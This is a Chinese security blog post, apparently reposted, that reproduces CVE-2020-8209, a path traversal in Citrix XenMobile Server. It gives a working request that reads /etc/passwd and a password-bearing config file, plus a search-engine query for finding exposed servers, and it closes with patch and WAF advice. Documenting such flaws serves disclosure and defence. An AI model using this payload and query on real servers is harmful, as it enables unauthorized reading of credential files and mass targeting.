漏洞复现 CVE-2020-8209

admin 2021年3月27日13:51:45评论195 views字数 661阅读2分12秒阅读模式

漏洞简介

        XenMobile是Citrix开发的企业移动性管理软件。该产品允许企业管理员工的移动设备和移动应用程序。该软件的目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。

        CVE-2020-8209,路径遍历漏洞。此漏洞允许未经授权的用户读取任意文件,包括包含密码的配置文件。



影响范围

RP2之前的XenMobile服务器10.12RP4之前的XenMobile服务器10.11RP6之前的XenMobile服务器10.1010.9 RP5之前的XenMobile服务器


漏洞复现
poc:

/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd

复现成功:

/etc/passwd

漏洞复现 CVE-2020-8209

/opt/sas/sw/config/sftu.properties

漏洞复现 CVE-2020-8209

命中率还是挺高的:

app="XenMobile-控制台"

结果如图:

漏洞复现 CVE-2020-8209



修复建议

官方补丁会删除了/opt/sas/sw/tomcat/inst1/webapps/ROOT/jsp/help-sb-download.jsp,因此对help-sb-download.jsp的所有请求都可以视为非法请求,并且应被WAF阻止。

建议检查访问日志中是否有以前的请求。



参考

https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/


本文始发于微信公众号(don9sec):漏洞复现 CVE-2020-8209

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年3月27日13:51:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现 CVE-2020-8209http://cn-sec.com/archives/186553.html

发表评论

匿名网友 填写信息